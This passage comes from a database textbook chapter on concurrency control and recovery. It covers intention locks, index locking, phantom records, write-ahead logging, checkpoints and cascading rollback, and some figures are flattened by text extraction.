or exclusive) it will require from one of the node’s descendants. There are three
types of intention locks:

1. Intention-shared (IS) indicates that one or more shared locks will be
requested on some descendant node(s).

2. Intention-exclusive (IX) indicates that one or more exclusive locks will be
requested on some descendant node(s).

3. Shared-intention-exclusive (SIX) indicates that the current node is locked in
shared mode but that one or more exclusive locks will be requested on some
descendant node(s).

The compatibility table of the three intention locks, and the shared and exclusive
locks, is shown in Figure 8. Besides the introduction of the three types of intention
locks, an appropriate locking protocol must be used. The multiple granularity
locking (MGL) protocol consists of the following rules:

1. The lock compatibility (based on Figure 8) must be adhered to.

2. The root of the tree must be locked first, in any mode.

3. A node N can be locked by a transaction T in S or IS mode only if the parent
node N is already locked by transaction T in either IS or IX mode.

4. A node N can be locked by a transaction T in X, IX, or SIX mode only if the
parent of node N is already locked by transaction T in either IX or SIX mode.

5. A transaction T can lock a node only if it has not unlocked any node (to
enforce the 2PL protocol).

800

Concurrency Control Techniques

IS

IX

S

SIX

X

IS

Yes

Yes

Yes

Yes

No

IX

Yes

No

Yes

No

No

S

No

Yes

Yes

No

No

SIX

No

No

Yes

No

No

X

No

No

No

No

No
Figure 8
Lock compatibility matrix for
multiple granularity locking.

6. A transaction T can unlock a node, N, only if none of the children of node N
are currently locked by T.

Rule 1 simply states that conflicting locks cannot be granted. Rules 2, 3, and 4 state
the conditions when a transaction may lock a given node in any of the lock modes.
Rules 5 and 6 of the MGL protocol enforce 2PL rules to produce serializable sched-
ules. To illustrate the MGL protocol with the database hierarchy in Figure 7, con-
sider the following three transactions:

1. T1 wants to update record r111 and record r211.

2. T2 wants to update all records on page p12.

3. T3 wants to read record r11j and the entire f2 file.

Figure 9 shows a possible serializable schedule for these three transactions. Only the
lock and unlock operations are shown. The notation () is used to
display the locking operations in the schedule.

The multiple granularity level protocol is especially suited when processing a mix of
transactions that include (1) short transactions that access only a few items (records
or fields) and (2) long transactions that access entire files. In this environment, less
transaction blocking and less locking overhead is incurred by such a protocol when
compared to a single level granularity locking approach.

6 Using Locks for Concurrency
Control in Indexes

Two-phase locking can also be applied to indexes, where the nodes of an index cor-
respond to disk pages. However, holding locks on index pages until the shrinking
phase of 2PL could cause an undue amount of transaction blocking because search-
ing an index always starts at the root. Therefore, if a transaction wants to insert a
record (write operation), the root would be locked in exclusive mode, so all other
conflicting lock requests for the index must wait until the transaction enters its
shrinking phase. This blocks all other transactions from accessing the index, so in
practice other approaches to locking an index must be used.

801

Concurrency Control Techniques

IX(db)
IX(f1)

T1

IX(p11)
X(r111)

IX(f2)
IX(p21)
X(p211)

unlock(r211)
unlock(p21)
unlock(f2)

unlock(r111)
unlock(p11)
unlock(f1)
unlock(db)

T3

IS(db)
IS(f1)
IS(p11)

S(r11j)

S(f2)

unlock(r11j)
unlock(p11)
unlock(f1)
unlock(f2)
unlock(db)

IX(db)

T2

IX(f1)
X(p12)

unlock(p12)
unlock(f1)
unlock(db)

Figure 9
Lock operations to
illustrate a serializable
schedule.

The tree structure of the index can be taken advantage of when developing a con-
currency control scheme. For example, when an index search (read operation) is
being executed, a path in the tree is traversed from the root to a leaf. Once a lower-
level node in the path has been accessed, the higher-level nodes in that path will not
be used again. So once a read lock on a child node is obtained, the lock on the par-
ent can be released. When an insertion is being applied to a leaf node (that is, when
a key and a pointer are inserted), then a specific leaf node must be locked in exclu-
sive mode. However, if that node is not full, the insertion will not cause changes to
higher-level index nodes, which implies that they need not be locked exclusively.

A conservative approach for insertions would be to lock the root node in exclusive
mode and then to access the appropriate child node of the root. If the child node is

802

Concurrency Control Techniques

not full, then the lock on the root node can be released. This approach can be
applied all the way down the tree to the leaf, which is typically three or four levels
from the root. Although exclusive locks are held, they are soon released. An alterna-
tive, more optimistic approach would be to request and hold shared locks on the
nodes leading to the leaf node, with an exclusive lock on the leaf. If the insertion
causes the leaf to split, insertion will propagate to one or more higher-level nodes.
Then, the locks on the higher-level nodes can be upgraded to exclusive mode.

Another approach to index locking is to use a variant of the B+-tree, called the B-
link tree. In a B-link tree, sibling nodes on the same level are linked at every level.
This allows shared locks to be used when requesting a page and requires that the
lock be released before accessing the child node. For an insert operation, the shared
lock on a node would be upgraded to exclusive mode. If a split occurs, the parent
node must be relocked in exclusive mode. One complication is for search operations
executed concurrently with the update. Suppose that a concurrent update operation
follows the same path as the search, and inserts a new entry into the leaf node.
Additionally, suppose that the insert causes that leaf node to split. When the insert is
done, the search process resumes, following the pointer to the desired leaf, only to
find that the key it is looking for is not present because the split has moved that key
into a new leaf node, which would be the right sibling of the original leaf node.
However, the search process can still succeed if it follows the pointer (link) in the
original leaf node to its right sibling, where the desired key has been moved.

Handling the deletion case, where two or more nodes from the index tree merge, is
also part of the B-link tree concurrency protocol. In this case, locks on the nodes to
be merged are held as well as a lock on the parent of the two nodes to be merged.

7 Other Concurrency Control Issues
In this section we discuss some other issues relevant to concurrency control. In
Section 7.1, we discuss problems associated with insertion and deletion of records
and the so-called phantom problem, which may occur when records are inserted. In
Section 7.2 we discuss problems that may occur when a transaction outputs some
data to a monitor before it commits, and then the transaction is later aborted.

7.1 Insertion, Deletion, and Phantom Records
When a new data item is inserted in the database, it obviously cannot be accessed
until after the item is created and the insert operation is completed. In a locking
environment, a lock for the item can be created and set to exclusive (write) mode;
the lock can be released at the same time as other write locks would be released,
based on the concurrency control protocol being used. For a timestamp-based pro-
tocol, the read and write timestamps of the new item are set to the timestamp of the
creating transaction.

803

Concurrency Control Techniques

Next, consider a deletion operation that is applied on an existing data item. For
locking protocols, again an exclusive (write) lock must be obtained before the trans-
action can delete the item. For timestamp ordering, the protocol must ensure that no
later transaction has read or written the item before allowing the item to be deleted.

A situation known as the phantom problem can occur when a new record that is
being inserted by some transaction T satisfies a condition that a set of records
accessed by another transaction T� must satisfy. For example, suppose that transac-
tion T is inserting a new EMPLOYEE record whose Dno = 5, while transaction T� is
accessing all EMPLOYEE records whose Dno = 5 (say, to add up all their Salary values
to calculate the personnel budget for department 5). If the equivalent serial order is
T followed by T�, then T�must read the new EMPLOYEE record and include its Salary
in the sum calculation. For the equivalent serial order T� followed by T, the new
salary should not be included. Notice that although the transactions logically con-
flict, in the latter case there is really no record (data item) in common between the
two transactions, since T� may have locked all the records with Dno = 5 before T
inserted the new record. This is because the record that causes the conflict is a
phantom record that has suddenly appeared in the database on being inserted. If
other operations in the two transactions conflict, the conflict due to the phantom
record may not be recognized by the concurrency control protocol.

One solution to the phantom record problem is to use index locking, as discussed
in Section 6. Recall that an index includes entries that have an attribute value, plus a
set of pointers to all records in the file with that value. For example, an index on Dno
of EMPLOYEE would include an entry for each distinct Dno value, plus a set of
pointers to all EMPLOYEE records with that value. If the index entry is locked before
the record itself can be accessed, then the conflict on the phantom record can be
detected, because transaction T� would request a read lock on the index entry for
Dno = 5, and T would request a write lock on the same entry before they could place
the locks on the actual records. Since the index locks conflict, the phantom conflict
would be detected.

A more general technique, called predicate locking, would lock access to all records
that satisfy an arbitrary predicate (condition) in a similar manner; however, predi-
cate locks have proved to be difficult to implement efficiently.

7.2 Interactive Transactions
Another problem occurs when interactive transactions read input and write output
to an interactive device, such as a monitor screen, before they are committed. The
problem is that a user can input a value of a data item to a transaction T that is
based on some value written to the screen by transaction T�, which may not have
committed. This dependency between T and T� cannot be modeled by the system
concurrency control method, since it is only based on the user interacting with the
two transactions.

An approach to dealing with this problem is to postpone output of transactions to
the screen until they have committed.

804

Concurrency Control Techniques

7.3 Latches
Locks held for a short duration are typically called latches. Latches do not follow the
usual concurrency control protocol such as two-phase locking. For example, a latch
can be used to guarantee the physical integrity of a page when that page is being
written from the buffer to disk. A latch would be acquired for the page, the page
written to disk, and then the latch released.

8 Summary
In this chapter we discussed DBMS techniques for concurrency control. We started
by discussing lock-based protocols, which are by far the most commonly used in
practice. We described the two-phase locking (2PL) protocol and a number of its
variations: basic 2PL, strict 2PL, conservative 2PL, and rigorous 2PL. The strict and
rigorous variations are more common because of their better recoverability proper-
ties. We introduced the concepts of shared (read) and exclusive (write) locks, and
showed how locking can guarantee serializability when used in conjunction with
the two-phase locking rule. We also presented various techniques for dealing with
the deadlock problem, which can occur with locking. In practice, it is common to
use timeouts and deadlock detection (wait-for graphs).

We presented other concurrency control protocols that are not used often in prac-
tice but are important for the theoretical alternatives they show for solving this
problem. These include the timestamp ordering protocol, which ensures serializ-
ability based on the order of transaction timestamps. Timestamps are unique,
system-generated transaction identifiers. We discussed Thomas’s write rule, which
improves performance but does not guarantee conflict serializability. The strict
timestamp ordering protocol was also presented. We discussed two multiversion
protocols, which assume that older versions of data items can be kept in the data-
base. One technique, called multiversion two-phase locking (which has been used in
practice), assumes that two versions can exist for an item and attempts to increase
concurrency by making write and read locks compatible (at the cost of introducing
an additional certify lock mode). We also presented a multiversion protocol based
on timestamp ordering, and an example of an optimistic protocol, which is also
known as a certification or validation protocol.

Then we turned our attention to the important practical issue of data item granu-
larity. We described a multigranularity locking protocol that allows the change of
granularity (item size) based on the current transaction mix, with the goal of
improving the performance of concurrency control. An important practical issue
was then presented, which is to develop locking protocols for indexes so that indexes
do not become a hindrance to concurrent access. Finally, we introduced the phan-
tom problem and problems with interactive transactions, and briefly described the
concept of latches and how it differs from locks.

805

Concurrency Control Techniques

Review Questions
1. What is the two-phase locking protocol? How does it guarantee serializabil-

ity?

2. What are some variations of the two-phase locking protocol? Why is strict or
rigorous two-phase locking often preferred?

3. Discuss the problems of deadlock and starvation, and the different
approaches to dealing with these problems.

4. Compare binary locks to exclusive/shared locks. Why is the latter type of
locks preferable?

5. Describe the wait-die and wound-wait protocols for deadlock prevention.

6. Describe the cautious waiting, no waiting, and timeout protocols for dead-
lock prevention.

7. What is a timestamp? How does the system generate timestamps?

8. Discuss the timestamp ordering protocol for concurrency control. How does
strict timestamp ordering differ from basic timestamp ordering?

9. Discuss two multiversion techniques for concurrency control.

10. What is a certify lock? What are the advantages and disadvantages of using
certify locks?

11. How do optimistic concurrency control techniques differ from other con-
currency control techniques? Why are they also called validation or certifica-
tion techniques? Discuss the typical phases of an optimistic concurrency
control method.

12. How does the granularity of data items affect the performance of concur-
rency control? What factors affect selection of granularity size for data items?

13. What type of lock is needed for insert and delete operations?

14. What is multiple granularity locking? Under what circumstances is it used?

15. What are intention locks?

16. When are latches used?

17. What is a phantom record? Discuss the problem that a phantom record can
cause for concurrency control.

18. How does index locking resolve the phantom problem?

19. What is a predicate lock?

806

Concurrency Control Techniques

Exercises
20. Prove that the basic two-phase locking protocol guarantees conflict serializ-

ability of schedules. (Hint: Show that if a serializability graph for a schedule
has a cycle, then at least one of the transactions participating in the schedule
does not obey the two-phase locking protocol.)

21. Modify the data structures for multiple-mode locks and the algorithms for
read_lock(X), write_lock(X), and unlock(X) so that upgrading and downgrad-
ing of locks are possible. (Hint: The lock needs to check the transaction id(s)
that hold the lock, if any.)

22. Prove that strict two-phase locking guarantees strict schedules.

23. Prove that the wait-die and wound-wait protocols avoid deadlock and star-
vation.

24. Prove that cautious waiting avoids deadlock.

25. Apply the timestamp ordering algorithm to the schedules in Figure A.1(b)
and (c) at the end of this chapter, and determine whether the algorithm will
allow the execution of the schedules.

26. Repeat Exercise 25, but use the multiversion timestamp ordering method.

27. Why is two-phase locking not used as a concurrency control method for
indexes such as B+-trees?

28. The compatibility matrix in Figure 8 shows that IS and IX locks are compat-
ible. Explain why this is valid.

29. The MGL protocol states that a transaction T can unlock a node N, only if
none of the children of node N are still locked by transaction T. Show that
without this condition, the MGL protocol would be incorrect.

Selected Bibliography
The two-phase locking protocol and the concept of predicate locks were first pro-
posed by Eswaran et al. (1976). Bernstein et al. (1987), Gray and Reuter (1993), and
Papadimitriou (1986) focus on concurrency control and recovery. Kumar (1996)
focuses on performance of concurrency control methods. Locking is discussed in
Gray et al. (1975), Lien and Weinberger (1978), Kedem and Silbershatz (1980), and
Korth (1983). Deadlocks and wait-for graphs were formalized by Holt (1972), and
the wait-wound and wound-die schemes are presented in Rosenkrantz et al. (1978).
Cautious waiting is discussed in Hsu and Zhang (1992). Helal et al. (1993) com-
pares various locking approaches. Timestamp-based concurrency control tech-
niques are discussed in Bernstein and Goodman (1980) and Reed (1983).
Optimistic concurrency control is discussed in Kung and Robinson (1981) and
Bassiouni (1988). Papadimitriou and Kanellakis (1979) and Bernstein and

807

Concurrency Control Techniques

Goodman (1983) discuss multiversion techniques. Multiversion timestamp order-
ing was proposed in Reed (1979, 1983), and multiversion two-phase locking is dis-
cussed in Lai and Wilkinson (1984). A method for multiple locking granularities
was proposed in Gray et al. (1975), and the effects of locking granularities are ana-
lyzed in Ries and Stonebraker (1977). Bhargava and Reidl (1988) presents an
approach for dynamically choosing among various concurrency control and recov-
ery methods. Concurrency control methods for indexes are presented in Lehman
and Yao (1981) and in Shasha and Goodman (1988). A performance study of vari-
ous B+-tree concurrency control algorithms is presented in Srinivasan and Carey
(1991).

Other work on concurrency control includes semantic-based concurrency control
(Badrinath and Ramamritham, 1992), transaction models for long-running activi-
ties (Dayal et al., 1991), and multilevel transaction management (Hasse and
Weikum, 1991).

808

Transaction T1
read_item(X );

write_item(X );

read_item(Y );

write_item(Y );

read_item(X );
write_item(X );

read_item(Y );
write_item(Y );

Transaction T3
read_item(Y );

read_item(Z );

write_item(Y );

write_item(Z );

read_item(Y );
read_item(Z );

write_item(Y);
write_item(Z );

Transaction T2
read_item(Z );

read_item(Y );

write_item(Y );

read_item(X );

write_item(X );

read_item(Z );
read_item(Y );
write_item(Y );

read_item(X );

write_item(X );

(b)

(a)

Schedule E

Time

read_item(X );
write_item(X );

read_item(Y );
write_item(Y );

read_item(Y );
read_item(Z );

write_item(Y );
write_item(Z );

read_item(Z );

read_item(Y );
write_item(Y );
read_item(X );
write_item(X );

(c)

Schedule F

Time

Transaction T1 Transaction T2 Transaction T3

Transaction T1 Transaction T2 Transaction T3

Figure A.1
Example of serializabil-
ity testing. (a) The
read and write opera-
tions of three transac-
tions T1, T2, and T3. (b)
Schedule E. (c)
Schedule F.

809

Database Recovery
Techniques

In this chapter we discuss some of the techniques thatcan be used for database recovery from failures.
This chapter presents concepts that are relevant to recovery protocols, and provides
an overview of the various database recovery algorithms We start in Section 1 with
an outline of a typical recovery procedure and a categorization of recovery algo-
rithms, and then we discuss several recovery concepts, including write-ahead log-
ging, in-place versus shadow updates, and the process of rolling back (undoing) the
effect of an incomplete or failed transaction. In Section 2 we pre-sent recovery tech-
niques based on deferred update, also known as the NO-UNDO/REDO technique,
where the data on disk is not updated until after a transaction commits. In Section 3
we discuss recovery techniques based on immediate update, where data can be
updated on disk during transaction execution; these include the UNDO/REDO and
UNDO/NO-REDO algorithms. We discuss the technique known as shadowing or
shadow paging, which can be categorized as a NO-UNDO/NO-REDO algorithm in
Section 4. An example of a practical DBMS recovery scheme, called ARIES, is pre-
sented in Section 5. Recovery in multidatabases is briefly discussed in Section 6.
Finally, techniques for recovery from catastrophic failure are discussed in Section 7.
Section 8 summarizes the chapter.

Our emphasis is on conceptually describing several different approaches to recov-
ery. For descriptions of recovery features in specific systems, the reader should con-
sult the bibliographic notes at the end of the chapter and the online and printed
user manuals for those systems. Recovery techniques are often intertwined with the

From Chapter 23 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

810

Database Recovery Techniques

concurrency control mechanisms. Certain recovery techniques are best used with
specific concurrency control methods. We will discuss recovery concepts indepen-
dently of concurrency control mechanisms, but we will discuss the circumstances
under which a particular recovery mechanism is best used with a certain concur-
rency control protocol.

1 Recovery Concepts

1.1 Recovery Outline and Categorization
of Recovery Algorithms

Recovery from transaction failures usually means that the database is restored to the
most recent consistent state just before the time of failure. To do this, the system
must keep information about the changes that were applied to data items by the
various transactions. This information is typically kept in the system log. A typical
strategy for recovery may be summarized informally as follows:

1. If there is extensive damage to a wide portion of the database due to cata-
strophic failure, such as a disk crash, the recovery method restores a past
copy of the database that was backed up to archival storage (typically tape or
other large capacity offline storage media) and reconstructs a more current
state by reapplying or redoing the operations of committed transactions
from the backed up log, up to the time of failure.

2. When the database on disk is not physically damaged, and a noncatastrophic
failure has occurred, the recovery strategy is to identify any changes that may
cause an inconsistency in the database. For example, a transaction that has
updated some database items on disk but has not been committed needs to
have its changes reversed by undoing its write operations. It may also be nec-
essary to redo some operations in order to restore a consistent state of the
database; for example, if a transaction has committed but some of its write
operations have not yet been written to disk. For noncatastrophic failure, the
recovery protocol does not need a complete archival copy of the database.
Rather, the entries kept in the online system log on disk are analyzed to
determine the appropriate actions for recovery.

Conceptually, we can distinguish two main techniques for recovery from noncata-
strophic transaction failures: deferred update and immediate update. The deferred
update techniques do not physically update the database on disk until after a trans-
action reaches its commit point; then the updates are recorded in the database.
Before reaching commit, all transaction updates are recorded in the local transac-
tion workspace or in the main memory buffers that the DBMS maintains (the
DBMS main memory cache). Before commit, the updates are recorded persistently
in the log, and then after commit, the updates are written to the database on disk.
If a transaction fails before reaching its commit point, it will not have changed the

811

Database Recovery Techniques

database in any way, so UNDO is not needed. It may be necessary to REDO the
effect of the operations of a committed transaction from the log, because their
effect may not yet have been recorded in the database on disk. Hence, deferred
update is also known as the NO-UNDO/REDO algorithm. We discuss this tech-
nique in Section 2.

In the immediate update techniques, the database may be updated by some opera-
tions of a transaction before the transaction reaches its commit point. However,
these operations must also be recorded in the log on disk by force-writing before they
are applied to the database on disk, making recovery still possible. If a transaction
fails after recording some changes in the database on disk but before reaching its
commit point, the effect of its operations on the database must be undone; that is,
the transaction must be rolled back. In the general case of immediate update, both
undo and redo may be required during recovery. This technique, known as the
UNDO/REDO algorithm, requires both operations during recovery, and is used
most often in practice. A variation of the algorithm where all updates are required
to be recorded in the database on disk before a transaction commits requires undo
only, so it is known as the UNDO/NO-REDO algorithm. We discuss these techniques
in Section 3.

The UNDO and REDO operations are required to be idempotent—that is, executing
an operation multiple times is equivalent to executing it just once. In fact, the whole
recovery process should be idempotent because if the system were to fail during the
recovery process, the next recovery attempt might UNDO and REDO certain
write_item operations that had already been executed during the first recovery
process. The result of recovery from a system crash during recovery should be the
same as the result of recovering when there is no crash during recovery!

1.2 Caching (Buffering) of Disk Blocks
The recovery process is often closely intertwined with operating system functions—
in particular, the buffering of database disk pages in the DBMS main memory
cache. Typically, multiple disk pages that include the data items to be updated are
cached into main memory buffers and then updated in memory before being writ-
ten back to disk. The caching of disk pages is traditionally an operating system func-
tion, but because of its importance to the efficiency of recovery procedures, it is
handled by the DBMS by calling low-level operating systems routines.

In general, it is convenient to consider recovery in terms of the database disk pages
(blocks). Typically a collection of in-memory buffers, called the DBMS cache, is
kept under the control of the DBMS for the purpose of holding these buffers. A
directory for the cache is used to keep track of which database items are in the
buffers.1 This can be a table of entries.
When the DBMS requests action on some item, first it checks the cache directory to
determine whether the disk page containing the item is in the DBMS cache. If it is

1This is somewhat similar to the concept of page tables used by the operating system.

812

Database Recovery Techniques

not, the item must be located on disk, and the appropriate disk pages are copied into
the cache. It may be necessary to replace (or flush) some of the cache buffers to
make space available for the new item. Some page replacement strategy similar to
these used in operating systems, such as least recently used (LRU) or first-in-first-
out (FIFO), or a new strategy that is DBMS-specific can be used to select the buffers
for replacement, such as DBMIN or Least-Likely-to-Use (see bibliographic notes).

The entries in the DBMS cache directory hold additional information relevant to
buffer management. Associated with each buffer in the cache is a dirty bit, which
can be included in the directory entry, to indicate whether or not the buffer has
been modified. When a page is first read from the database disk into a cache buffer,
a new entry is inserted in the cache directory with the new disk page address, and
the dirty bit is set to 0 (zero). As soon as the buffer is modified, the dirty bit for the
corresponding directory entry is set to 1 (one). Additional information, such as the
transaction id(s) of the transaction(s) that modified the buffer can also be kept in
the directory. When the buffer contents are replaced (flushed) from the cache, the
contents must first be written back to the corresponding disk page only if its dirty bit
is 1. Another bit, called the pin-unpin bit, is also needed—a page in the cache is
pinned (bit value 1 (one)) if it cannot be written back to disk as yet. For example,
the recovery protocol may restrict certain buffer pages from being written back to
the disk until the transactions that changed this buffer have committed.

Two main strategies can be employed when flushing a modified buffer back to disk.
The first strategy, known as in-place updating, writes the buffer to the same original
disk location, thus overwriting the old value of any changed data items on disk.2

Hence, a single copy of each database disk block is maintained. The second strategy,
known as shadowing, writes an updated buffer at a different disk location, so mul-
tiple versions of data items can be maintained, but this approach is not typically
used in practice.

In general, the old value of the data item before updating is called the before image
(BFIM), and the new value after updating is called the after image (AFIM). If shad-
owing is used, both the BFIM and the AFIM can be kept on disk; hence, it is not
strictly necessary to maintain a log for recovering. We briefly discuss recovery based
on shadowing in Section 4.

1.3 Write-Ahead Logging, Steal/No-Steal,
and Force/No-Force

When in-place updating is used, it is necessary to use a log for recovery. In this case,
the recovery mechanism must ensure that the BFIM of the data item is recorded in
the appropriate log entry and that the log entry is flushed to disk before the BFIM is
overwritten with the AFIM in the database on disk. This process is generally known
as write-ahead logging, and is necessary to be able to UNDO the operation if this is
required during recovery. Before we can describe a protocol for write-ahead

2In-place updating is used in most systems in practice.

813

Database Recovery Techniques

logging, we need to distinguish between two types of log entry information
included for a write command: the information needed for UNDO and the informa-
tion needed for REDO. A REDO-type log entry includes the new value (AFIM) of
the item written by the operation since this is needed to redo the effect of the oper-
ation from the log (by setting the item value in the database on disk to its AFIM).
The UNDO-type log entries include the old value (BFIM) of the item since this is
needed to undo the effect of the operation from the log (by setting the item value in
the database back to its BFIM). In an UNDO/REDO algorithm, both types of log
entries are combined. Additionally, when cascading rollback is possible, read_item
entries in the log are considered to be UNDO-type entries (see Section 1.5).

As mentioned, the DBMS cache holds the cached database disk blocks in main
memory buffers, which include not only data blocks, but also index blocks and log
blocks from the disk. When a log record is written, it is stored in the current log
buffer in the DBMS cache. The log is simply a sequential (append-only) disk file,
and the DBMS cache may contain several log blocks in main memory buffers (typi-
cally, the last n log blocks of the log file). When an update to a data block—stored in
the DBMS cache—is made, an associated log record is written to the last log buffer
in the DBMS cache. With the write-ahead logging approach, the log buffers (blocks)
that contain the associated log records for a particular data block update must first
be written to disk before the data block itself can be written back to disk from its
main memory buffer.

Standard DBMS recovery terminology includes the terms steal/no-steal and
force/no-force, which specify the rules that govern when a page from the database
can be written to disk from the cache:

1. If a cache buffer page updated by a transaction cannot be written to disk
before the transaction commits, the recovery method is called a no-steal
approach. The pin-unpin bit will be used to indicate if a page cannot be
written back to disk. On the other hand, if the recovery protocol allows writ-
ing an updated buffer before the transaction commits, it is called steal. Steal
is used when the DBMS cache (buffer) manager needs a buffer frame for
another transaction and the buffer manager replaces an existing page that
had been updated but whose transaction has not committed. The no-steal
rule means that UNDO will never be needed during recovery, since a commit-
ted transaction will not have any of its updates on disk before it commits.

2. If all pages updated by a transaction are immediately written to disk before
the transaction commits, it is called a force approach. Otherwise, it is called
no-force. The force rule means that REDO will never be needed during recov-
ery, since any committed transaction will have all its updates on disk before
it is committed.

The deferred update (NO-UNDO) recovery scheme discussed in Section 2 follows a
no-steal approach. However, typical database systems employ a steal/no-force strat-
egy. The advantage of steal is that it avoids the need for a very large buffer space to
store all updated pages in memory. The advantage of no-force is that an updated

814

Database Recovery Techniques

page of a committed transaction may still be in the buffer when another transaction
needs to update it, thus eliminating the I/O cost to write that page multiple times to
disk, and possibly to have to read it again from disk. This may provide a substantial
saving in the number of disk I/O operations when a specific page is updated heavily
by multiple transactions.

To permit recovery when in-place updating is used, the appropriate entries required
for recovery must be permanently recorded in the log on disk before changes are
applied to the database. For example, consider the following write-ahead logging
(WAL) protocol for a recovery algorithm that requires both UNDO and REDO:

1. The before image of an item cannot be overwritten by its after image in the
database on disk until all UNDO-type log records for the updating transac-
tion—up to this point—have been force-written to disk.

2. The commit operation of a transaction cannot be completed until all the
REDO-type and UNDO-type log records for that transaction have been force-
written to disk.

To facilitate the recovery process, the DBMS recovery subsystem may need to main-
tain a number of lists related to the transactions being processed in the system.
These include a list for active transactions that have started but not committed as
yet, and it may also include lists of all committed and aborted transactions since
the last checkpoint (see the next section). Maintaining these lists makes the recovery
process more efficient.

1.4 Checkpoints in the System Log
and Fuzzy Checkpointing

Another type of entry in the log is called a checkpoint.3 A [checkpoint, list of active
transactions] record is written into the log periodically at that point when the system
writes out to the database on disk all DBMS buffers that have been modified. As a
consequence of this, all transactions that have their [commit, T ] entries in the log
before a [checkpoint] entry do not need to have their WRITE operations redone in case
of a system crash, since all their updates will be recorded in the database on disk
during checkpointing. As part of checkpointing, the list of transaction ids for active
transactions at the time of the checkpoint is included in the checkpoint record, so
that these transactions can be easily identified during recovery.

The recovery manager of a DBMS must decide at what intervals to take a check-
point. The interval may be measured in time—say, every m minutes—or in the
number t of committed transactions since the last checkpoint, where the values of m
or t are system parameters. Taking a checkpoint consists of the following actions:

1. Suspend execution of transactions temporarily.

2. Force-write all main memory buffers that have been modified to disk.

3The term checkpoint has been used to describe more restrictive situations in some systems, such as
DB2. It has also been used in the literature to describe entirely different concepts.

815

Database Recovery Techniques

3. Write a [checkpoint] record to the log, and force-write the log to disk.

4. Resume executing transactions.

As a consequence of step 2, a checkpoint record in the log may also include addi-
tional information, such as a list of active transaction ids, and the locations
(addresses) of the first and most recent (last) records in the log for each active trans-
action. This can facilitate undoing transaction operations in the event that a trans-
action must be rolled back.

The time needed to force-write all modified memory buffers may delay transaction
processing because of step 1. To reduce this delay, it is common to use a technique
called fuzzy checkpointing. In this technique, the system can resume transaction
processing after a [begin_checkpoint] record is written to the log without having to
wait for step 2 to finish. When step 2 is completed, an [end_checkpoint, …] record is
written in the log with the relevant information collected during checkpointing.
However, until step 2 is completed, the previous checkpoint record should remain
valid. To accomplish this, the system maintains a file on disk that contains a pointer
to the valid checkpoint, which continues to point to the previous checkpoint record
in the log. Once step 2 is concluded, that pointer is changed to point to the new
checkpoint in the log.

1.5 Transaction Rollback and Cascading Rollback
If a transaction fails for whatever reason after updating the database, but before the
transaction commits, it may be necessary to roll back the transaction. If any data
item values have been changed by the transaction and written to the database, they
must be restored to their previous values (BFIMs). The undo-type log entries are
used to restore the old values of data items that must be rolled back.

If a transaction T is rolled back, any transaction S that has, in the interim, read the
value of some data item X written by T must also be rolled back. Similarly, once S is
rolled back, any transaction R that has read the value of some data item Y written by
S must also be rolled back; and so on. This phenomenon is called cascading roll-
back, and can occur when the recovery protocol ensures recoverable schedules but
does not ensure strict or cascadeless schedules. Understandably, cascading rollback
can be quite complex and time-consuming. That is why almost all recovery mecha-
nisms are designed so that cascading rollback is never required.

Figure 1 shows an example where cascading rollback is required. The read and write
operations of three individual transactions are shown in Figure 1(a). Figure 1(b)
shows the system log at the point of a system crash for a particular execution sched-
ule of these transactions. The values of data items A, B, C, and D, which are used by
the transactions, are shown to the right of the system log entries. We assume that the
original item values, shown in the first line, are A = 30, B = 15, C = 40, and D = 20. At
the point of system failure, transaction T3 has not reached its conclusion and must be
rolled back. The WRITE operations of T3, marked by a single * in Figure 1(b), are the
T3 operations that are undone during transaction rollback. Figure 1(c) graphically
shows the operations of the different transactions along the time axis.

816

(a)

(b)

*

**

**

[start_transaction,T3]

[read_item,T3,C]

[write_item,T3,B,15,12]
[start_transaction,T2]

[read_item,T2,B]

[write_item,T2,B,12,18]

[write_item,T1,D,20,25]

[write_item,T2,D,25,26]

[start_transaction,T1]
[read_item,T1,A]

[read_item,T1,D]

[read_item,T2,D]

[read_item,T3,A]

* T3 is rolled back because it
did not reach its commit point.

** T2 is rolled back because it
reads the value of item B written by T3.

read_item(A)

read_item(D)
write_item(D)

read_item(B)

write_item(B)
read_item(D)

write_item(D)

System crash

T3T2T1
read_item(C)

write_item(B)
read_item(A)

write_item(A)

A

30

B

15

12

18

C

40

D

20

25

26

(c) READ(C)

BEGIN

READ(A)WRITE(B)

T3

READ(B)

BEGIN

WRITE(D)READ(D)WRITE(B)

READ(A)

BEGIN

System crash

Time

READ(D) WRITE(D)

T2

T1

Figure 1
Illustrating cascading rollback
(a process that never occurs
in strict or cascadeless
schedules). (a) The read and
write operations of three
transactions. (b) System log at
point of crash. (c) Operations
before the crash.

Database Recovery Techniques

817

We must now check for cascading rollback. From Figure 1(c) we see that transaction
T2 reads the value of item B that was written by transaction T3; this can also be
determined by examining the log. Because T3 is rolled back, T2 must now be rolled
back, too. The WRITE operations of T2, marked by ** in the log, are the ones that are
undone. Note that only write_item operations need to be undone during transaction
rollback; read_item operations are recorded in the log only to determine whether
cascading rollback of additional transactions is necessary.

In practice, cascading rollback of transactions is never required because practical
recovery methods guarantee cascadeless or strict schedules. Hence, there is also no
need to record any read_item operations in the log because these are needed only for
determining cascading rollback.

1.6 Transaction Actions That Do Not Affect
the Database

In general, a transaction will have actions that do not affect the database, such as
generating and printing messages or reports from information retrieved from the
database. If a transaction fails before completion, we may not want the user to get
these reports, since the transaction has failed to complete. If such erroneous reports
are produced, part of the recovery process would have to inform the user that these
reports are wrong, since the user may take an action based on these reports that
affects the database. Hence, such reports should be generated only after the transac-
tion reaches its commit point. A common method of dealing with such actions is to
issue the commands that generate the reports but keep them as batch jobs, which
are executed only after the transaction reaches its commit point. If the transaction
fails, the batch jobs are canceled.

2 NO-UNDO/REDO Recovery Based
on Deferred Update

The idea behind deferred update is to defer or postpone any actual updates to the
database on disk until the transaction completes its execution successfully and
reaches its commit point.4

During transaction execution, the updates are recorded only in the log and in the
cache buffers. After the transaction reaches its commit point and the log is force-
written to disk, the updates are recorded in the database. If a transaction fails before
reaching its commit point, there is no need to undo any operations because the
transaction has not affected the database on disk in any way. Therefore, only REDO-
type log entries are needed in the log, which include the new value (AFIM) of the
item written by a write operation. The UNDO-type log entries are not needed since
no undoing of operations will be required during recovery. Although this may sim-
plify the recovery process, it cannot be used in practice unless transactions are short

Database Recovery Techniques

4Hence deferred update can generally be characterized as a no-steal approach.

818

Database Recovery Techniques

and each transaction changes few items. For other types of transactions, there is the
potential for running out of buffer space because transaction changes must be held
